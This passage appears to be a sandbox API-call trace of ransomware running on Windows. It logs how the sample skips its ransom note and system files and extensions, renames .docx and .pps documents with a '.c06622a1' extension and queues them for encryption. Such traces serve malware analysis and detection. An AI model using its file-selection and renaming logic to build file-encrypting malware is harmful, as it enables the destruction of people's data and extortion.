_Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eZ6Mr_pLus.pps" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eZ6Mr_pLus.pps") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eZ6Mr_pLus.pps" [0157.668] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eZ6Mr_pLus.pps") returned 0x3a [0157.668] wcscpy (in: _Dest=0x32200c4, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0157.668] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eZ6Mr_pLus.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ez6mr_plus.pps"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eZ6Mr_pLus.pps.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ez6mr_plus.pps.c06622a1"), dwFlags=0x8) returned 1 [0157.670] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eZ6Mr_pLus.pps.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ez6mr_plus.pps.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x1cc [0157.670] CreateIoCompletionPort (FileHandle=0x1cc, ExistingCompletionPort=0xd8, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0xd8 [0157.670] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x3510020 [0157.678] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x13789b2c [0157.678] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x706864b0 [0157.678] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x42d7c3cb [0157.678] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x55648a9c [0157.678] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x176dcfa6 [0157.678] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x6daa5b61 [0157.678] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x14b782f8 [0157.678] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x13d4351d [0157.681] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3510094, Length=0x80) returned 0x3de89a5f [0157.681] RtlComputeCrc32 (PartialCrc=0x9a5f, Buffer=0x3510094, Length=0x80) returned 0x4a57f1c6 [0157.681] RtlComputeCrc32 (PartialCrc=0xf1c6, Buffer=0x3510094, Length=0x80) returned 0x4b4170ba [0157.681] RtlComputeCrc32 (PartialCrc=0x70ba, Buffer=0x3510094, Length=0x80) returned 0x596dc20e [0157.681] RtlComputeCrc32 (PartialCrc=0xc20e, Buffer=0x3510094, Length=0x80) returned 0xce2cfd19 [0157.681] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x3510020) returned 1 [0157.681] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3210048) returned 1 [0157.682] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3220050) returned 1 [0157.683] FindNextFileW (in: hFindFile=0x154148, lpFindFileData=0x32ed9c | out: lpFindFileData=0x32ed9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5989e0, ftCreationTime.dwHighDateTime=0x1d5e575, ftLastAccessTime.dwLowDateTime=0x17dfe70, ftLastAccessTime.dwHighDateTime=0x1d562d8, ftLastWriteTime.dwLowDateTime=0x17dfe70, ftLastWriteTime.dwHighDateTime=0x1d562d8, nFileSizeHigh=0x0, nFileSizeLow=0x1723e, dwReserved0=0x0, dwReserved1=0x0, cFileName="f8BYKgohnV4.docx", cAlternateFileName="F8BYKG~1.DOC")) returned 1 [0157.683] _wcsicmp (_Str1="f8BYKgohnV4.docx", _Str2="README.c06622a1.TXT") returned -12 [0157.683] wcsstr (_Str="f8BYKgohnV4.docx", _SubStr="README") returned 0x0 [0157.683] _wcsicmp (_Str1="autorun.inf", _Str2="f8BYKgohnV4.docx") returned -5 [0157.683] wcslen (_String="autorun.inf") returned 0xb [0157.683] _wcsicmp (_Str1="boot.ini", _Str2="f8BYKgohnV4.docx") returned -4 [0157.684] wcslen (_String="boot.ini") returned 0x8 [0157.684] _wcsicmp (_Str1="bootfont.bin", _Str2="f8BYKgohnV4.docx") returned -4 [0157.684] wcslen (_String="bootfont.bin") returned 0xc [0157.684] _wcsicmp (_Str1="bootsect.bak", _Str2="f8BYKgohnV4.docx") returned -4 [0157.684] wcslen (_String="bootsect.bak") returned 0xc [0157.684] _wcsicmp (_Str1="desktop.ini", _Str2="f8BYKgohnV4.docx") returned -2 [0157.684] wcslen (_String="desktop.ini") returned 0xb [0157.684] _wcsicmp (_Str1="iconcache.db", _Str2="f8BYKgohnV4.docx") returned 3 [0157.684] wcslen (_String="iconcache.db") returned 0xc [0157.684] _wcsicmp (_Str1="ntldr", _Str2="f8BYKgohnV4.docx") returned 8 [0157.684] wcslen (_String="ntldr") returned 0x5 [0157.684] _wcsicmp (_Str1="ntuser.dat", _Str2="f8BYKgohnV4.docx") returned 8 [0157.684] wcslen (_String="ntuser.dat") returned 0xa [0157.684] _wcsicmp (_Str1="ntuser.dat.log", _Str2="f8BYKgohnV4.docx") returned 8 [0157.684] wcslen (_String="ntuser.dat.log") returned 0xe [0157.684] _wcsicmp (_Str1="ntuser.ini", _Str2="f8BYKgohnV4.docx") returned 8 [0157.684] wcslen (_String="ntuser.ini") returned 0xa [0157.684] _wcsicmp (_Str1="thumbs.db", _Str2="f8BYKgohnV4.docx") returned 14 [0157.684] wcslen (_String="thumbs.db") returned 0x9 [0157.684] _wcsicmp (_Str1="386", _Str2="docx") returned -49 [0157.684] wcslen (_String="386") returned 0x3 [0157.684] _wcsicmp (_Str1="adv", _Str2="docx") returned -3 [0157.684] wcslen (_String="adv") returned 0x3 [0157.684] _wcsicmp (_Str1="ani", _Str2="docx") returned -3 [0157.684] wcslen (_String="ani") returned 0x3 [0157.684] _wcsicmp (_Str1="bat", _Str2="docx") returned -2 [0157.684] wcslen (_String="bat") returned 0x3 [0157.684] _wcsicmp (_Str1="bin", _Str2="docx") returned -2 [0157.684] wcslen (_String="bin") returned 0x3 [0157.684] _wcsicmp (_Str1="cab", _Str2="docx") returned -1 [0157.684] wcslen (_String="cab") returned 0x3 [0157.685] _wcsicmp (_Str1="cmd", _Str2="docx") returned -1 [0157.685] wcslen (_String="cmd") returned 0x3 [0157.685] _wcsicmp (_Str1="com", _Str2="docx") returned -1 [0157.685] wcslen (_String="com") returned 0x3 [0157.685] _wcsicmp (_Str1="cpl", _Str2="docx") returned -1 [0157.685] wcslen (_String="cpl") returned 0x3 [0157.685] _wcsicmp (_Str1="cur", _Str2="docx") returned -1 [0157.685] wcslen (_String="cur") returned 0x3 [0157.685] _wcsicmp (_Str1="deskthemepack", _Str2="docx") returned -10 [0157.685] wcslen (_String="deskthemepack") returned 0xd [0157.685] _wcsicmp (_Str1="diagcab", _Str2="docx") returned -6 [0157.685] wcslen (_String="diagcab") returned 0x7 [0157.685] _wcsicmp (_Str1="diagcfg", _Str2="docx") returned -6 [0157.685] wcslen (_String="diagcfg") returned 0x7 [0157.685] _wcsicmp (_Str1="diagpkg", _Str2="docx") returned -6 [0157.685] wcslen (_String="diagpkg") returned 0x7 [0157.685] _wcsicmp (_Str1="dll", _Str2="docx") returned -3 [0157.685] wcslen (_String="dll") returned 0x3 [0157.685] _wcsicmp (_Str1="drv", _Str2="docx") returned 3 [0157.685] wcslen (_String="drv") returned 0x3 [0157.685] _wcsicmp (_Str1="exe", _Str2="docx") returned 1 [0157.685] wcslen (_String="exe") returned 0x3 [0157.685] _wcsicmp (_Str1="hlp", _Str2="docx") returned 4 [0157.685] wcslen (_String="hlp") returned 0x3 [0157.685] _wcsicmp (_Str1="icl", _Str2="docx") returned 5 [0157.685] wcslen (_String="icl") returned 0x3 [0157.685] _wcsicmp (_Str1="icns", _Str2="docx") returned 5 [0157.685] wcslen (_String="icns") returned 0x4 [0157.685] _wcsicmp (_Str1="ico", _Str2="docx") returned 5 [0157.685] wcslen (_String="ico") returned 0x3 [0157.685] _wcsicmp (_Str1="ics", _Str2="docx") returned 5 [0157.685] wcslen (_String="ics") returned 0x3 [0157.685] _wcsicmp (_Str1="idx", _Str2="docx") returned 5 [0157.686] wcslen (_String="idx") returned 0x3 [0157.686] _wcsicmp (_Str1="ldf", _Str2="docx") returned 8 [0157.686] wcslen (_String="ldf") returned 0x3 [0157.686] _wcsicmp (_Str1="lnk", _Str2="docx") returned 8 [0157.686] wcslen (_String="lnk") returned 0x3 [0157.686] _wcsicmp (_Str1="mod", _Str2="docx") returned 9 [0157.686] wcslen (_String="mod") returned 0x3 [0157.686] _wcsicmp (_Str1="mpa", _Str2="docx") returned 9 [0157.686] wcslen (_String="mpa") returned 0x3 [0157.686] _wcsicmp (_Str1="msc", _Str2="docx") returned 9 [0157.686] wcslen (_String="msc") returned 0x3 [0157.686] _wcsicmp (_Str1="msp", _Str2="docx") returned 9 [0157.686] wcslen (_String="msp") returned 0x3 [0157.686] _wcsicmp (_Str1="msstyles", _Str2="docx") returned 9 [0157.686] wcslen (_String="msstyles") returned 0x8 [0157.686] _wcsicmp (_Str1="msu", _Str2="docx") returned 9 [0157.686] wcslen (_String="msu") returned 0x3 [0157.686] _wcsicmp (_Str1="nls", _Str2="docx") returned 10 [0157.686] wcslen (_String="nls") returned 0x3 [0157.686] _wcsicmp (_Str1="nomedia", _Str2="docx") returned 10 [0157.686] wcslen (_String="nomedia") returned 0x7 [0157.686] _wcsicmp (_Str1="ocx", _Str2="docx") returned 11 [0157.686] wcslen (_String="ocx") returned 0x3 [0157.686] _wcsicmp (_Str1="prf", _Str2="docx") returned 12 [0157.686] wcslen (_String="prf") returned 0x3 [0157.686] _wcsicmp (_Str1="ps1", _Str2="docx") returned 12 [0157.686] wcslen (_String="ps1") returned 0x3 [0157.686] _wcsicmp (_Str1="rom", _Str2="docx") returned 14 [0157.686] wcslen (_String="rom") returned 0x3 [0157.686] _wcsicmp (_Str1="rtp", _Str2="docx") returned 14 [0157.686] wcslen (_String="rtp") returned 0x3 [0157.686] _wcsicmp (_Str1="scr", _Str2="docx") returned 15 [0157.687] wcslen (_String="scr") returned 0x3 [0157.687] _wcsicmp (_Str1="shs", _Str2="docx") returned 15 [0157.687] wcslen (_String="shs") returned 0x3 [0157.687] _wcsicmp (_Str1="spl", _Str2="docx") returned 15 [0157.687] wcslen (_String="spl") returned 0x3 [0157.687] _wcsicmp (_Str1="sys", _Str2="docx") returned 15 [0157.687] wcslen (_String="sys") returned 0x3 [0157.687] _wcsicmp (_Str1="theme", _Str2="docx") returned 16 [0157.687] wcslen (_String="theme") returned 0x5 [0157.687] _wcsicmp (_Str1="themepack", _Str2="docx") returned 16 [0157.687] wcslen (_String="themepack") returned 0x9 [0157.687] _wcsicmp (_Str1="wpx", _Str2="docx") returned 19 [0157.687] wcslen (_String="wpx") returned 0x3 [0157.687] _wcsicmp (_Str1="lock", _Str2="docx") returned 8 [0157.687] wcslen (_String="lock") returned 0x4 [0157.687] _wcsicmp (_Str1="key", _Str2="docx") returned 7 [0157.687] wcslen (_String="key") returned 0x3 [0157.687] _wcsicmp (_Str1="hta", _Str2="docx") returned 4 [0157.687] wcslen (_String="hta") returned 0x3 [0157.687] _wcsicmp (_Str1="msi", _Str2="docx") returned 9 [0157.687] wcslen (_String="msi") returned 0x3 [0157.687] _wcsicmp (_Str1="pdb", _Str2="docx") returned 12 [0157.687] wcslen (_String="pdb") returned 0x3 [0157.687] _wcsicmp (_Str1="sqlite", _Str2="docx") returned 15 [0157.687] wcslen (_String="sqlite") returned 0x6 [0157.687] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents")) returned 0x11 [0157.687] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3210048 [0157.688] wcscpy (in: _Dest=0x3210048, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" [0157.688] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x2b [0157.688] wcscpy (in: _Dest=0x32100a0, _Source="f8BYKgohnV4.docx" | out: _Dest="f8BYKgohnV4.docx") returned="f8BYKgohnV4.docx" [0157.688] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\f8BYKgohnV4.docx", dwFileAttributes=0x80) returned 1 [0157.688] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\f8BYKgohnV4.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\f8bykgohnv4.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ac [0157.688] SetFilePointerEx (in: hFile=0x1ac, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0157.688] ReadFile (in: hFile=0x1ac, lpBuffer=0x32ec24, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x32ecb4, lpOverlapped=0x0 | out: lpBuffer=0x32ec24*, lpNumberOfBytesRead=0x32ecb4*=0x90, lpOverlapped=0x0) returned 1 [0157.689] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32ec24, Length=0x80) returned 0x3497392e [0157.689] RtlComputeCrc32 (PartialCrc=0x392e, Buffer=0x32ec24, Length=0x80) returned 0x9c97ffb1 [0157.689] RtlComputeCrc32 (PartialCrc=0xffb1, Buffer=0x32ec24, Length=0x80) returned 0xa0b2804d [0157.689] RtlComputeCrc32 (PartialCrc=0x804d, Buffer=0x32ec24, Length=0x80) returned 0x40d73b04 [0157.689] RtlComputeCrc32 (PartialCrc=0x3b04, Buffer=0x32ec24, Length=0x80) returned 0xb0a383b9 [0157.689] CloseHandle (hObject=0x1ac) returned 1 [0157.689] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3220050 [0157.689] wcscpy (in: _Dest=0x3220050, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\f8BYKgohnV4.docx" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\f8BYKgohnV4.docx") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\f8BYKgohnV4.docx" [0157.689] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\f8BYKgohnV4.docx") returned 0x3c [0157.689] wcscpy (in: _Dest=0x32200c8, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0157.689] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\f8BYKgohnV4.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\f8bykgohnv4.docx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\f8BYKgohnV4.docx.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\f8bykgohnv4.docx.c06622a1"), dwFlags=0x8) returned 1 [0157.692] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\f8BYKgohnV4.docx.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\f8bykgohnv4.docx.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x1ac [0157.692] CreateIoCompletionPort (FileHandle=0x1ac, ExistingCompletionPort=0x130, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x130 [0157.692] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x35a0020 [0157.699] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x5207bd40 [0157.699] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x73eb75f4 [0157.699] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x7df89963 [0157.699] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x5f21f980 [0157.699] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x73675995 [0157.699] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x5c4ca23c [0157.699] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x25bcb71c [0157.699] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0xfef30a6 [0157.702] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x35a0094, Length=0x80) returned 0x4290187a [0157.703] RtlComputeCrc32 (PartialCrc=0x187a, Buffer=0x35a0094, Length=0x80) returned 0x5a2bd3b8 [0157.703] RtlComputeCrc32 (PartialCrc=0xd3b8, Buffer=0x35a0094, Length=0x80) returned 0xc97d16b6 [0157.703] RtlComputeCrc32 (PartialCrc=0x16b6, Buffer=0x35a0094, Length=0x80) returned 0x4977d2e0 [0157.703] RtlComputeCrc32 (PartialCrc=0xd2e0, Buffer=0x35a0094, Length=0x80) returned 0xbc8d0369 [0157.703] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x35a0020) returned 1 [0157.703] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3210048) returned 1 [0157.704] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3220050) returned 1 [0157.705] FindNextFileW (in: hFindFile=0x154148, lpFindFileData=0x32ed9c | out: lpFindFileData=0x32ed9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf48630, ftCreationTime.dwHighDateTime=0x1d59bb9, ftLastAccessTime.dwLowDateTime=0xbed57210, ftLastAccessTime.dwHighDateTime=0x1d5650c, ftLastWriteTime.dwLowDateTime=0xbed57210, ftLastWriteTime.dwHighDateTime=0x1d5650c, nFileSizeHigh=0x0, nFileSizeLow=0x64f3, dwReserved0=0x0, dwReserved1=0x0, cFileName="GWKv.docx", cAlternateFileName="GWKV~1.DOC")) returned 1 [0157.705] _wcsicmp (_Str1="GWKv.docx", _Str2="README.c06622a1.TXT") returned -11 [0157.705] wcsstr (_Str="GWKv.docx", _SubStr="README") returned 0x0 [0157.705] _wcsicmp (_Str1="autorun.inf", _Str2="GWKv.docx") returned -6 [0157.705] wcslen (_String="autorun.inf") returned 0xb [0157.705] _wcsicmp (_Str1="boot.ini", _Str2="GWKv.docx") returned -5 [0157.705] wcslen (_String="boot.ini") returned 0x8 [0157.705] _wcsicmp (_Str1="bootfont.bin", _Str2="GWKv.docx") returned -5 [0157.705] wcslen (_String="bootfont.bin") returned 0xc [0157.705] _wcsicmp (_Str1="bootsect.bak", _Str2="GWKv.docx") returned -5 [0157.705] wcslen (_String="bootsect.bak") returned 0xc [0157.706] _wcsicmp (_Str1="desktop.ini", _Str2="GWKv.docx") returned -3 [0157.706] wcslen (_String="desktop.ini") returned 0xb [0157.706] _wcsicmp (_Str1="iconcache.db", _Str2="GWKv.docx") returned 2 [0157.706] wcslen (_String="iconcache.db") returned 0xc [0157.706] _wcsicmp (_Str1="ntldr", _Str2="GWKv.docx") returned 7 [0157.706] wcslen (_String="ntldr") returned 0x5 [0157.706] _wcsicmp (_Str1="ntuser.dat", _Str2="GWKv.docx") returned 7 [0157.706] wcslen (_String="ntuser.dat") returned 0xa [0157.706] _wcsicmp (_Str1="ntuser.dat.log", _Str2="GWKv.docx") returned 7 [0157.706] wcslen (_String="ntuser.dat.log") returned 0xe [0157.706] _wcsicmp (_Str1="ntuser.ini", _Str2="GWKv.docx") returned 7 [0157.706] wcslen (_String="ntuser.ini") returned 0xa [0157.706] _wcsicmp (_Str1="thumbs.db", _Str2="GWKv.docx") returned 13 [0157.706] wcslen (_String="thumbs.db") returned 0x9 [0157.706] _wcsicmp (_Str1="386", _Str2="docx") returned -49 [0157.706] wcslen (_String="386") returned 0x3 [0157.706] _wcsicmp (_Str1="adv", _Str2="docx") returned -3 [0157.706] wcslen (_String="adv") returned 0x3 [0157.706] _wcsicmp (_Str1="ani", _Str2="docx") returned -3 [0157.706] wcslen (_String="ani") returned 0x3 [0157.706] _wcsicmp (_Str1="bat", _Str2="docx") returned -2 [0157.706] wcslen (_String="bat") returned 0x3 [0157.706] _wcsicmp (_Str1="bin", _Str2="docx") returned -2 [0157.706] wcslen (_String="bin") returned 0x3 [0157.706] _wcsicmp (_Str1="cab", _Str2="docx") returned -1 [0157.707] wcslen (_String="cab") returned 0x3 [0157.707] _wcsicmp (_Str1="cmd", _Str2="docx") returned -1 [0157.707] wcslen (_String="cmd") returned 0x3 [0157.707] _wcsicmp (_Str1="com", _Str2="docx") returned -1 [0157.707] wcslen (_String="com") returned 0x3 [0157.707] _wcsicmp (_Str1="cpl", _Str2="docx") returned -1 [0157.707] wcslen (_String="cpl") returned 0x3 [0157.707] _wcsicmp (_Str1="cur", _Str2="docx") returned -1 [0157.707] wcslen (_String="cur") returned 0x3 [0157.707] _wcsicmp (_Str1="deskthemepack", _Str2="docx") returned -10 [0157.707] wcslen (_String="deskthemepack") returned 0xd [0157.707] _wcsicmp (_Str1="diagcab", _Str2="docx") returned -6 [0157.707] wcslen (_String="diagcab") returned 0x7 [0157.707] _wcsicmp (_Str1="diagcfg", _Str2="docx") returned -6 [0157.707] wcslen (_String="diagcfg") returned 0x7 [0157.707] _wcsicmp (_Str1="diagpkg", _Str2="docx") returned -6 [0157.707] wcslen (_String="diagpkg") returned 0x7 [0157.707] _wcsicmp (_Str1="dll", _Str2="docx") returned -3 [0157.707] wcslen (_String="dll") returned 0x3 [0157.707] _wcsicmp (_Str1="drv", _Str2="docx") returned 3 [0157.707] wcslen (_String="drv") returned 0x3 [0157.707] _wcsicmp (_Str1="exe", _Str2="docx") returned 1 [0157.707] wcslen (_String="exe") returned 0x3 [0157.707] _wcsicmp (_Str1="hlp", _Str2="docx") returned 4 [0157.707] wcslen (_String="hlp") returned 0x3 [0157.707] _wcsicmp (_Str1="icl", _Str2="docx") returned 5 [0157.707] wcslen (_String="icl") returned 0x3 [0157.707] _wcsicmp (_Str1="icns", _Str2="docx") returned 5 [0157.707] wcslen (_String="icns") returned 0x4 [0157.707] _wcsicmp (_Str1="ico", _Str2="docx") returned 5 [0157.707] wcslen (_String="ico") returned 0x3 [0157.707] _wcsicmp (_Str1="ics", _Str2="docx") returned 5 [0157.707] wcslen (_String="ics") returned 0x3 [0157.707] _wcsicmp (_Str1="idx", _Str2="docx") returned 5 [0157.707] wcslen (_String="idx") returned 0x3 [0157.708] _wcsicmp (_Str1="ldf", _Str2="docx") returned 8 [0157.708] wcslen (_String="ldf") returned 0x3 [0157.708] _wcsicmp (_Str1="lnk", _Str2="docx") returned 8 [0157.708] wcslen (_String="lnk") returned 0x3 [0157.708] _wcsicmp (_Str1="mod", _Str2="docx") returned 9 [0157.708] wcslen (_String="mod") returned 0x3 [0157.708] _wcsicmp (_Str1="mpa", _Str2="docx") returned 9 [0157.708] wcslen (_String="mpa") returned 0x3 [0157.708] _wcsicmp (_Str1="msc", _Str2="docx") returned 9 [0157.708] wcslen (_String="msc") returned 0x3 [0157.708] _wcsicmp (_Str1="msp", _Str2="docx") returned 9 [0157.708] wcslen (_String="msp") returned 0x3 [0157.708] _wcsicmp (_Str1="msstyles", _Str2="docx") returned 9 [0157.708] wcslen (_String="msstyles") returned 0x8 [0157.708] _wcsicmp (_Str1="msu", _Str2="docx") returned 9 [0157.708] wcslen (_String="msu") returned 0x3 [0157.708] _wcsicmp (_Str1="nls", _Str2="docx") returned 10 [0157.708] wcslen (_String="nls") returned 0x3 [0157.708] _wcsicmp (_Str1="nomedia", _Str2="docx") returned 10 [0157.708] wcslen (_String="nomedia") returned 0x7 [0157.708] _wcsicmp (_Str1="ocx", _Str2="docx") returned 11 [0157.708] wcslen (_String="ocx") returned 0x3 [0157.708] _wcsicmp (_Str1="prf", _Str2="docx") returned 12 [0157.708] wcslen (_String="prf") returned 0x3 [0157.708] _wcsicmp (_Str1="ps1", _Str2="docx") returned 12 [0157.708] wcslen (_String="ps1") returned 0x3 [0157.708] _wcsicmp (_Str1="rom", _Str2="docx") returned 14 [0157.708] wcslen (_String="rom") returned 0x3 [0157.708] _wcsicmp (_Str1="rtp", _Str2="docx") returned 14 [0157.708] wcslen (_String="rtp") returned 0x3 [0157.708] _wcsicmp (_Str1="scr", _Str2="docx") returned 15 [0157.708] wcslen (_String="scr") returned 0x3 [0157.708] _wcsicmp (_Str1="shs", _Str2="docx") returned 15 [0157.709] wcslen (_String="shs") returned 0x3 [0157.709] _wcsicmp (_Str1="spl", _Str2="docx") returned 15 [0157.709] wcslen (_String="spl") returned 0x3 [0157.709] _wcsicmp (_Str1="sys", _Str2="docx") returned 15 [0157.709] wcslen (_String="sys") returned 0x3 [0157.709] _wcsicmp (_Str1="theme", _Str2="docx") returned 16 [0157.709] wcslen (_String="theme") returned 0x5 [0157.709] _wcsicmp (_Str1="themepack", _Str2="docx") returned 16 [0157.709] wcslen (_String="themepack") returned 0x9 [0157.709] _wcsicmp (_Str1="wpx", _Str2="docx") returned 19 [0157.709] wcslen (_String="wpx") returned 0x3 [0157.709] _wcsicmp (_Str1="lock", _Str2="docx") returned 8 [0157.709] wcslen (_String="lock") returned 0x4 [0157.709] _wcsicmp (_Str1="key", _Str2="docx") returned 7 [0157.709] wcslen (_String="key") returned 0x3 [0157.709] _wcsicmp (_Str1="hta", _Str2="docx") returned 4 [0157.709] wcslen (_String="hta") returned 0x3 [0157.709] _wcsicmp (_Str1="msi", _Str2="docx") returned 9 [0157.709] wcslen (_String="msi") returned 0x3 [0157.709] _wcsicmp (_Str1="pdb", _Str2="docx") returned 12 [0157.709] wcslen (_String="pdb") returned 0x3 [0157.709] _wcsicmp (_Str1="sqlite", _Str2="docx") returned 15 [0157.709] wcslen (_String="sqlite") returned 0x6 [0157.709] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents")) returned 0x11 [0157.709] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3210048 [0157.709] wcscpy (in: _Dest=0x3210048, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" [0157.709] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x2b [0157.710] wcscpy (in: _Dest=0x32100a0, _Source="GWKv.docx" | out: _Dest="GWKv.docx") returned="GWKv.docx" [0157.710] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\GWKv.docx", dwFileAttributes=0x80) returned 1 [0157.710] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\GWKv.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\gwkv.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a0 [0157.710] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0157.710] ReadFile (in: hFile=0x1a0, lpBuffer=0x32ec24, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x32ecb4, lpOverlapped=0x0 | out: lpBuffer=0x32ec24*, lpNumberOfBytesRead=0x32ecb4*=0x90, lpOverlapped=0x0) returned 1 [0157.711] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32ec24, Length=0x80) returned 0x163bde7 [0157.711] RtlComputeCrc32 (PartialCrc=0xbde7, Buffer=0x32ec24, Length=0x80) returned 0x866fad35 [0157.711] RtlComputeCrc32 (PartialCrc=0xad35, Buffer=0x32ec24, Length=0x80) returned 0xe496c02c [0157.711] RtlComputeCrc32 (PartialCrc=0xc02c, Buffer=0x32ec24, Length=0x80) returned 0xfa2cffc7 